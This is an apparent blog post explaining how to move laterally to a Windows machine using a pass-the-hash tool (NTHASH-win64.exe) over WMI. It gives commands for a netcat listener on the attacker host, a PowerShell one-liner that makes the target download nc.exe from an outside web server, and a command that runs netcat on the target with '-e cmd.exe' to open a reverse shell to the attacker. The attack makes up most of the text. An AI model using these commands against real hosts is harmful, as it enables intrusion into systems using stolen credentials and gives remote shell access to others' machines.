Oct 292019

This time, lets introduce a variant of previous article.

Rather than copying a file to a target using a remote admin$ share (which is not always available), lets have the target download a file via http.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.download a file from internet on a remote target

(remember, you are using a pth shell with proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

Notice the %2f in place of the ‘/’ – Indeed, we need to escape this as otherwise it would be understood as command line parameter.

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.


Poster un Commentaire

1 Fils de commentaires
0 Réponses de fil
0 Abonnés
Commentaire avec le plus de réactions
Le plus populaire des commentaires
0 Auteurs du commentaire
Auteurs de commentaires récents

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

le plus récent le plus ancien
Notifier de

[…] lets again introduce a variant of previous article. […]